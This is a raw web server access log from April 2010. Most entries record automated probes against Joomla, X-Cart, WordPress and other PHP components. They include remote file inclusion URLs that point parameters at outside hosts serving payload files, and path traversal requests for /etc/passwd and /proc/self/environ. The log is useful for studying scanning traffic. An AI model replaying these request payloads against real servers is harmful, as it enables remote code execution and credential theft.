217.70.32.2 - - [23/Apr/2010:03:00:37 -0500] "GET /logs/access_log.1212105600//content/multithumb/multithumb.php?mosConfig_absolute_path=http://hdmi.interfree.it/FxID1.txt?? HTTP/1.1" 404 345 "-""Mozilla/5.0"
213.189.224.16 - - [23/Apr/2010:03:01:23 -0500] "GET /playing.php/common/db.php?commonpath=http://takesi.freewebhostx.com/fx29id1.txt?????? HTTP/1.1" 404 309 "-""Mozilla/5.0"
213.189.224.16 - - [23/Apr/2010:03:01:23 -0500] "GET /logs/access_log.1270684800/playing.php/common/db.php?commonpath=http://takesi.freewebhostx.com/fx29id1.txt?????? HTTP/1.1" 404 336 "-""Mozilla/5.0"
213.189.224.16 - - [23/Apr/2010:03:01:23 -0500] "GET /logs/access_log.1270684800/playing.php/common/db.php?commonpath=http://takesi.freewebhostx.com/fx29id1.txt?????? HTTP/1.1" 404 336 "-""Mozilla/5.0"
213.189.224.16 - - [23/Apr/2010:03:01:23 -0500] "GET /logs/playing.php/common/db.php?commonpath=http://takesi.freewebhostx.com/fx29id1.txt?????? HTTP/1.1" 404 314 "-""Mozilla/5.0"
213.189.224.16 - - [23/Apr/2010:03:01:23 -0500] "GET /playing.php/common/db.php?commonpath=http://takesi.freewebhostx.com/fx29id1.txt?????? HTTP/1.1" 404 309 "-""Mozilla/5.0"
213.189.224.16 - - [23/Apr/2010:03:01:23 -0500] "GET /logs/playing.php/common/db.php?commonpath=http://takesi.freewebhostx.com/fx29id1.txt?????? HTTP/1.1" 404 314 "-""Mozilla/5.0"
88.191.94.188 - - [23/Apr/2010:03:01:59 -0500] "GET /logs/access_log.1268611200//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 358 "-""Mozilla/5.0"
88.191.94.188 - - [23/Apr/2010:03:02:24 -0500] "GET /logs/access_log.1268611200//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 358 "-""Mozilla/5.0"
66.244.236.248 - - [23/Apr/2010:03:03:31 -0500] "GET /playing.php/common/db.php?commonpath=http://takesi.freewebhostx.com/fx29id1.txt?????? HTTP/1.1" 404 309 "-""Mozilla/5.0"
66.244.236.248 - - [23/Apr/2010:03:03:40 -0500] "GET /logs/playing.php/common/db.php?commonpath=http://takesi.freewebhostx.com/fx29id1.txt?????? HTTP/1.1" 404 314 "-""Mozilla/5.0"
66.244.236.248 - - [23/Apr/2010:03:03:40 -0500] "GET /logs/access_log.1270684800/playing.php/common/db.php?commonpath=http://takesi.freewebhostx.com/fx29id1.txt?????? HTTP/1.1" 404 336 "-""Mozilla/5.0"
66.244.236.248 - - [23/Apr/2010:03:06:01 -0500] "GET /logs/access_log.1270684800%20%20/playing.php/common/db.php?commonpath=http://takesi.freewebhostx.com/fx29id1.txt?????? HTTP/1.1" 404 338 "-""Mozilla/5.0"
213.189.224.16 - - [23/Apr/2010:03:11:39 -0500] "GET /logs/access_log.1270684800%20%20/playing.php/common/db.php?commonpath=http://takesi.freewebhostx.com/fx29id1.txt?????? HTTP/1.1" 404 338 "-""Mozilla/5.0"
213.189.224.16 - - [23/Apr/2010:03:11:54 -0500] "GET /logs/access_log.1270684800%20%20/playing.php/common/db.php?commonpath=http://takesi.freewebhostx.com/fx29id1.txt?????? HTTP/1.1" 404 338 "-""Mozilla/5.0"
114.111.36.26 - - [23/Apr/2010:03:12:31 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/4.0 (compatible; NaverBot/1.0; http://help.naver.com/customer_webtxt_02.jsp)"
114.111.36.26 - - [23/Apr/2010:03:12:46 -0500] "GET / HTTP/1.1" 200 1003 "-""Mozilla/4.0 (compatible; NaverBot/1.0; http://help.naver.com/customer_webtxt_02.jsp)"
66.244.236.248 - - [23/Apr/2010:03:12:50 -0500] "GET /logs/access_log.1270684800%20%20/playing.php/common/db.php?commonpath=http://takesi.freewebhostx.com/fx29id1.txt?????? HTTP/1.1" 404 338 "-""Mozilla/5.0"
84.40.30.37 - - [23/Apr/2010:03:13:04 -0500] "GET //components/com_colorlab/admin.color.php?mosConfig_live_site=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 324 "-""Mozilla/5.0"
84.40.30.37 - - [23/Apr/2010:03:13:04 -0500] "GET /logs//components/com_colorlab/admin.color.php?mosConfig_live_site=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 329 "-""Mozilla/5.0"
84.40.30.37 - - [23/Apr/2010:03:13:04 -0500] "GET /logs/access_log.1219708800%20%20//components/com_colorlab/admin.color.php?mosConfig_live_site=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 353 "-""Mozilla/5.0"
84.40.30.37 - - [23/Apr/2010:03:13:10 -0500] "GET //components/com_colorlab/admin.color.php?mosConfig_live_site=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 324 "-""Mozilla/5.0"
84.40.30.37 - - [23/Apr/2010:03:13:10 -0500] "GET /logs/access_log.1219708800%20%20//components/com_colorlab/admin.color.php?mosConfig_live_site=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 353 "-""Mozilla/5.0"
84.40.30.37 - - [23/Apr/2010:03:13:10 -0500] "GET /logs//components/com_colorlab/admin.color.php?mosConfig_live_site=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 329 "-""Mozilla/5.0"
84.40.30.37 - - [23/Apr/2010:03:13:18 -0500] "GET /logs/access_log.1219708800//components/com_colorlab/admin.color.php?mosConfig_live_site=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 351 "-""Mozilla/5.0"
84.40.30.37 - - [23/Apr/2010:03:13:18 -0500] "GET //components/com_colorlab/admin.color.php?mosConfig_live_site=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 324 "-""Mozilla/5.0"
84.40.30.37 - - [23/Apr/2010:03:13:18 -0500] "GET /logs//components/com_colorlab/admin.color.php?mosConfig_live_site=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 329 "-""Mozilla/5.0"
84.40.30.37 - - [23/Apr/2010:03:13:20 -0500] "GET /logs//components/com_colorlab/admin.color.php?mosConfig_live_site=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 329 "-""Mozilla/5.0"
84.40.30.37 - - [23/Apr/2010:03:13:20 -0500] "GET //components/com_colorlab/admin.color.php?mosConfig_live_site=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 324 "-""Mozilla/5.0"
84.40.30.37 - - [23/Apr/2010:03:13:20 -0500] "GET /logs/access_log.1219708800//components/com_colorlab/admin.color.php?mosConfig_live_site=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 351 "-""Mozilla/5.0"
200.201.180.130 - - [23/Apr/2010:03:26:03 -0500] "GET /?sourcedir=http://www.aktivhotel-veronika.at/mambots/editors/jce/jscripts/tiny_mce/plugins/fireboard/id1.txt?? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
200.201.180.130 - - [23/Apr/2010:03:26:04 -0500] "GET /logs/?sourcedir=http://www.aktivhotel-veronika.at/mambots/editors/jce/jscripts/tiny_mce/plugins/fireboard/id1.txt?? HTTP/1.1" 200 2837 "-""Mozilla/5.0"
200.201.180.130 - - [23/Apr/2010:03:26:04 -0500] "GET /logs/access_log.1219708800/?sourcedir=http://www.aktivhotel-veronika.at/mambots/editors/jce/jscripts/tiny_mce/plugins/fireboard/id1.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
84.40.30.37 - - [23/Apr/2010:03:27:56 -0500] "GET //admin/auth.php?xcart_dir=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 299 "-""Mozilla/5.0"
84.40.30.37 - - [23/Apr/2010:03:27:57 -0500] "GET /logs//admin/auth.php?xcart_dir=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 304 "-""Mozilla/5.0"
84.40.30.37 - - [23/Apr/2010:03:27:57 -0500] "GET /logs/access_log.1262995200//admin/auth.php?xcart_dir=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 326 "-""Mozilla/5.0"
84.40.30.37 - - [23/Apr/2010:03:28:13 -0500] "GET /logs/access_log.1262995200//admin/auth.php?xcart_dir=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 326 "-""Mozilla/5.0"
84.40.30.37 - - [23/Apr/2010:03:28:13 -0500] "GET /logs//admin/auth.php?xcart_dir=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 304 "-""Mozilla/5.0"
84.40.30.37 - - [23/Apr/2010:03:28:13 -0500] "GET //admin/auth.php?xcart_dir=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 299 "-""Mozilla/5.0"
84.40.30.37 - - [23/Apr/2010:03:28:31 -0500] "GET /logs/access_log.1262995200//admin/auth.php?xcart_dir=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 326 "-""Mozilla/5.0"
84.40.30.37 - - [23/Apr/2010:03:28:31 -0500] "GET //admin/auth.php?xcart_dir=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 299 "-""Mozilla/5.0"
84.40.30.37 - - [23/Apr/2010:03:28:31 -0500] "GET /logs//admin/auth.php?xcart_dir=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 304 "-""Mozilla/5.0"
84.40.30.37 - - [23/Apr/2010:03:28:40 -0500] "GET /logs/access_log.1263859200//admin/auth.php?xcart_dir=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 326 "-""Mozilla/5.0"
84.40.30.37 - - [23/Apr/2010:03:29:02 -0500] "GET /logs/access_log.1263859200//admin/auth.php?xcart_dir=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 326 "-""Mozilla/5.0"
84.40.30.37 - - [23/Apr/2010:03:29:07 -0500] "GET /logs/access_log.1263859200//admin/auth.php?xcart_dir=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 326 "-""Mozilla/5.0"
213.189.224.16 - - [23/Apr/2010:03:29:50 -0500] "GET //playing.php/common/db.php?commonpath=http://takesi.freewebhostx.com/fx29id1.txt?????? HTTP/1.1" 404 310 "-""Mozilla/5.0"
213.189.224.16 - - [23/Apr/2010:03:29:50 -0500] "GET /logs//playing.php/common/db.php?commonpath=http://takesi.freewebhostx.com/fx29id1.txt?????? HTTP/1.1" 404 315 "-""Mozilla/5.0"
213.189.224.16 - - [23/Apr/2010:03:29:50 -0500] "GET /logs/access_log.1270684800%20%20//playing.php/common/db.php?commonpath=http://takesi.freewebhostx.com/fx29id1.txt?????? HTTP/1.1" 404 339 "-""Mozilla/5.0"
66.244.236.248 - - [23/Apr/2010:03:30:17 -0500] "GET //playing.php/common/db.php?commonpath=http://takesi.freewebhostx.com/fx29id1.txt?????? HTTP/1.1" 404 310 "-""Mozilla/5.0"
66.244.236.248 - - [23/Apr/2010:03:30:17 -0500] "GET /logs/access_log.1270684800%20%20//playing.php/common/db.php?commonpath=http://takesi.freewebhostx.com/fx29id1.txt?????? HTTP/1.1" 404 339 "-""Mozilla/5.0"
66.244.236.248 - - [23/Apr/2010:03:30:17 -0500] "GET /logs//playing.php/common/db.php?commonpath=http://takesi.freewebhostx.com/fx29id1.txt?????? HTTP/1.1" 404 315 "-""Mozilla/5.0"
66.244.236.248 - - [23/Apr/2010:03:30:31 -0500] "GET /logs//playing.php/common/db.php?commonpath=http://takesi.freewebhostx.com/fx29id1.txt?????? HTTP/1.1" 404 315 "-""Mozilla/5.0"
66.244.236.248 - - [23/Apr/2010:03:30:31 -0500] "GET /logs/access_log.1270684800%20%20//playing.php/common/db.php?commonpath=http://takesi.freewebhostx.com/fx29id1.txt?????? HTTP/1.1" 404 339 "-""Mozilla/5.0"
66.244.236.248 - - [23/Apr/2010:03:30:31 -0500] "GET //playing.php/common/db.php?commonpath=http://takesi.freewebhostx.com/fx29id1.txt?????? HTTP/1.1" 404 310 "-""Mozilla/5.0"
207.46.195.241 - - [23/Apr/2010:03:30:55 -0500] "GET /logs/access_log.1169424000 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
66.244.236.248 - - [23/Apr/2010:03:31:03 -0500] "GET /logs//playing.php/common/db.php?commonpath=http://takesi.freewebhostx.com/fx29id1.txt?????? HTTP/1.1" 404 315 "-""Mozilla/5.0"
66.244.236.248 - - [23/Apr/2010:03:31:03 -0500] "GET /logs/access_log.1270684800%20%20//playing.php/common/db.php?commonpath=http://takesi.freewebhostx.com/fx29id1.txt?????? HTTP/1.1" 404 339 "-""Mozilla/5.0"
66.244.236.248 - - [23/Apr/2010:03:31:03 -0500] "GET //playing.php/common/db.php?commonpath=http://takesi.freewebhostx.com/fx29id1.txt?????? HTTP/1.1" 404 310 "-""Mozilla/5.0"
213.189.224.16 - - [23/Apr/2010:03:31:18 -0500] "GET //playing.php/common/db.php?commonpath=http://takesi.freewebhostx.com/fx29id1.txt?????? HTTP/1.1" 404 310 "-""Mozilla/5.0"
213.189.224.16 - - [23/Apr/2010:03:31:18 -0500] "GET /logs/access_log.1270684800%20%20//playing.php/common/db.php?commonpath=http://takesi.freewebhostx.com/fx29id1.txt?????? HTTP/1.1" 404 339 "-""Mozilla/5.0"
213.189.224.16 - - [23/Apr/2010:03:31:18 -0500] "GET /logs//playing.php/common/db.php?commonpath=http://takesi.freewebhostx.com/fx29id1.txt?????? HTTP/1.1" 404 315 "-""Mozilla/5.0"
94.23.31.164 - - [23/Apr/2010:03:33:45 -0500] "GET /logs/index.php?option=com_projectfork§ion=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
94.23.31.164 - - [23/Apr/2010:03:33:45 -0500] "GET /index.php?option=com_projectfork§ion=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
84.40.30.37 - - [23/Apr/2010:03:34:29 -0500] "GET /logs//admin/auth.php?xcart_dir=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 304 "-""Mozilla/5.0"
84.40.30.37 - - [23/Apr/2010:03:34:29 -0500] "GET //admin/auth.php?xcart_dir=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 299 "-""Mozilla/5.0"
84.40.30.37 - - [23/Apr/2010:03:34:29 -0500] "GET /logs/access_log.1262995200//admin/auth.php?xcart_dir=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 326 "-""Mozilla/5.0"
84.40.30.37 - - [23/Apr/2010:03:34:57 -0500] "GET /logs/access_log.1263859200//admin/auth.php?xcart_dir=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 326 "-""Mozilla/5.0"
217.70.32.2 - - [23/Apr/2010:03:35:36 -0500] "GET //conlib/local.php?cfg[path][contenido]=http://hdmi.interfree.it/FxID1.txt?? HTTP/1.1" 404 301 "-""Mozilla/5.0"
217.70.32.2 - - [23/Apr/2010:03:35:36 -0500] "GET /logs//conlib/local.php?cfg[path][contenido]=http://hdmi.interfree.it/FxID1.txt?? HTTP/1.1" 404 306 "-""Mozilla/5.0"
217.70.32.2 - - [23/Apr/2010:03:35:36 -0500] "GET /logs/access_log.1262563200//conlib/local.php?cfg[path][contenido]=http://hdmi.interfree.it/FxID1.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
217.70.32.2 - - [23/Apr/2010:03:35:57 -0500] "GET /logs/access_log.1264464000//conlib/local.php?cfg[path][contenido]=http://hdmi.interfree.it/FxID1.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
217.70.32.2 - - [23/Apr/2010:03:36:06 -0500] "GET /logs/access_log.1264464000//conlib/local.php?cfg[path][contenido]=http://hdmi.interfree.it/FxID1.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
217.70.32.2 - - [23/Apr/2010:03:36:06 -0500] "GET //conlib/local.php?cfg[path][contenido]=http://hdmi.interfree.it/FxID1.txt?? HTTP/1.1" 404 301 "-""Mozilla/5.0"
217.70.32.2 - - [23/Apr/2010:03:36:06 -0500] "GET /logs//conlib/local.php?cfg[path][contenido]=http://hdmi.interfree.it/FxID1.txt?? HTTP/1.1" 404 306 "-""Mozilla/5.0"
174.132.26.98 - - [23/Apr/2010:03:37:06 -0500] "GET //components/com_sitemap/sitemap.php?mosConfig_admin_path=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 404 319 "-""Mozilla/5.0"
174.132.26.98 - - [23/Apr/2010:03:37:11 -0500] "GET /logs/access_log.1270598400%20%20//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 404 348 "-""Mozilla/5.0"
174.132.26.98 - - [23/Apr/2010:03:37:11 -0500] "GET /logs//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 404 324 "-""Mozilla/5.0"
94.23.31.164 - - [23/Apr/2010:03:37:19 -0500] "GET /logs/wp-content/plugins/wp-lytebox/main.php?pg=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 327 "-""libwww-perl/5.803"
94.23.31.164 - - [23/Apr/2010:03:37:19 -0500] "GET /wp-content/plugins/wp-lytebox/main.php?pg=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 322 "-""libwww-perl/5.803"
213.189.224.16 - - [23/Apr/2010:03:38:55 -0500] "GET /logs//poll/booth.php?include_path=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 304 "-""Mozilla/5.0"
213.189.224.16 - - [23/Apr/2010:03:38:55 -0500] "GET /logs/access_log.1220054400%20%20//poll/booth.php?include_path=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
213.189.224.16 - - [23/Apr/2010:03:38:55 -0500] "GET //poll/booth.php?include_path=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
213.189.224.16 - - [23/Apr/2010:03:39:24 -0500] "GET /logs/access_log.1220054400%20%20//poll/booth.php?include_path=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 328 "-""Mozilla/5.0"
213.189.224.16 - - [23/Apr/2010:03:39:24 -0500] "GET /logs//poll/booth.php?include_path=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 304 "-""Mozilla/5.0"
213.189.224.16 - - [23/Apr/2010:03:39:24 -0500] "GET //poll/booth.php?include_path=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 299 "-""Mozilla/5.0"
67.195.112.180 - - [23/Apr/2010:03:39:33 -0500] "GET /logs/?D=D HTTP/1.0" 200 2825 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
174.132.26.98 - - [23/Apr/2010:03:39:43 -0500] "GET /logs/access_log.1271030400%20%20//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 404 348 "-""Mozilla/5.0"
207.46.13.139 - - [23/Apr/2010:03:46:56 -0500] "GET /logs/access_log.1212019200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
174.132.26.98 - - [23/Apr/2010:03:47:33 -0500] "GET /logs/access_log.1219622400//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 404 346 "-""Mozilla/5.0"
174.132.26.98 - - [23/Apr/2010:03:49:12 -0500] "GET /logs/access_log.1268265600//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 404 346 "-""Mozilla/5.0"
91.121.167.15 - - [23/Apr/2010:03:54:40 -0500] "GET ///index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2"
195.216.234.1 - - [23/Apr/2010:03:54:40 -0500] "GET ///index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 5.0; Mac_PowerPC)"
65.254.54.122 - - [23/Apr/2010:03:54:46 -0500] "GET ///index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.0.8) Geck"
204.14.3.162 - - [23/Apr/2010:03:55:27 -0500] "GET ///index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.0.8) Geck"
195.216.234.1 - - [23/Apr/2010:03:56:27 -0500] "GET /logs/access_log.1268611200///index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 322 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
195.216.234.1 - - [23/Apr/2010:03:56:27 -0500] "GET ///index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1"
195.216.234.1 - - [23/Apr/2010:03:56:27 -0500] "GET /logs///index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 300 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; (R1 1"
207.46.13.98 - - [23/Apr/2010:03:58:25 -0500] "GET /logs/access_log.1224547200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
91.121.167.15 - - [23/Apr/2010:03:58:28 -0500] "GET /logs/access_log.1268611200///index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 322 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; (R1 1"
91.121.167.15 - - [23/Apr/2010:03:58:28 -0500] "GET ///index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1) Gecko/"
91.121.167.15 - - [23/Apr/2010:03:58:28 -0500] "GET /logs///index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 300 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
65.254.54.122 - - [23/Apr/2010:03:59:26 -0500] "GET /logs/access_log.1268611200///index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 322 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.1) Gecko/20061204 Firefox/2.0.0.1"
65.254.54.122 - - [23/Apr/2010:03:59:26 -0500] "GET ///index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1) Gecko/"
65.254.54.122 - - [23/Apr/2010:03:59:26 -0500] "GET /logs///index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 300 "-""Mozilla/5.0 (Windows; U; Windows NT 5.0; nl; rv:1.8.0.9) Geck"
207.46.199.39 - - [23/Apr/2010:03:59:55 -0500] "GET /logs/access_log.1212451200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.13.43 - - [23/Apr/2010:04:00:24 -0500] "GET /logs/access_log.1174867200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.13.43 - - [23/Apr/2010:04:00:24 -0500] "GET /logs/access_log.1177027200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
204.14.3.162 - - [23/Apr/2010:04:01:55 -0500] "GET /logs/access_log.1268611200///index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 322 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.1) Gecko/20061204 Firefox/2.0.0.1"
204.14.3.162 - - [23/Apr/2010:04:01:55 -0500] "GET ///index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1"
204.14.3.162 - - [23/Apr/2010:04:01:55 -0500] "GET /logs///index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 300 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1) Gecko/"
207.46.13.45 - - [23/Apr/2010:04:07:24 -0500] "GET /logs/access_log.1163030400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
78.110.50.120 - - [23/Apr/2010:04:07:50 -0500] "GET /logs/access_log.1266278400//index.php?option=com_sef&Itemid=&mosConfig_absolute_path=http://www.foodntop.com/bbs/icon/LC1?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
78.110.50.120 - - [23/Apr/2010:04:07:50 -0500] "GET /logs//index.php?option=com_sef&Itemid=&mosConfig_absolute_path=http://www.foodntop.com/bbs/icon/LC1?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
78.110.50.120 - - [23/Apr/2010:04:07:50 -0500] "GET //index.php?option=com_sef&Itemid=&mosConfig_absolute_path=http://www.foodntop.com/bbs/icon/LC1?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
78.110.50.120 - - [23/Apr/2010:04:07:50 -0500] "GET /logs/access_log.1265760000//index.php?option=com_sef&Itemid=&mosConfig_absolute_path=http://www.foodntop.com/bbs/icon/LC1?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
193.86.111.249 - - [23/Apr/2010:04:10:17 -0500] "GET /costume/costume2.htm HTTP/1.1" 200 1799 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; cs; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3"
193.86.111.249 - - [23/Apr/2010:04:10:17 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; cs; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3"
193.86.111.249 - - [23/Apr/2010:04:10:19 -0500] "GET /costume/thmb1.htm HTTP/1.1" 200 3957 "http://tomdolan.pconline.com/costume/costume2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; cs; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3"
193.86.111.249 - - [23/Apr/2010:04:10:20 -0500] "GET /costume/001_JPG%20copy.jpg HTTP/1.1" 200 46065 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; cs; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3"
193.86.111.249 - - [23/Apr/2010:04:10:20 -0500] "GET /costume/002_JPG%20copy.jpg HTTP/1.1" 200 44353 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; cs; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3"
193.86.111.249 - - [23/Apr/2010:04:10:20 -0500] "GET /costume/004_JPG%20copy.jpg HTTP/1.1" 200 44129 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; cs; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3"
193.86.111.249 - - [23/Apr/2010:04:10:20 -0500] "GET /costume/007_JPG%20copy.jpg HTTP/1.1" 200 43100 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; cs; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3"
193.86.111.249 - - [23/Apr/2010:04:10:20 -0500] "GET /costume/003_JPG%20copy.jpg HTTP/1.1" 200 50590 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; cs; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3"
193.86.111.249 - - [23/Apr/2010:04:10:20 -0500] "GET /costume/006_JPG%20copy.jpg HTTP/1.1" 200 49320 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; cs; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3"
193.86.111.249 - - [23/Apr/2010:04:10:20 -0500] "GET /costume/005_JPG%20copy.jpg HTTP/1.1" 200 44973 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; cs; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3"
193.86.111.249 - - [23/Apr/2010:04:10:20 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; cs; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3"
193.86.111.249 - - [23/Apr/2010:04:10:21 -0500] "GET /costume/008_JPG%20copy.jpg HTTP/1.1" 200 43767 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; cs; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3"
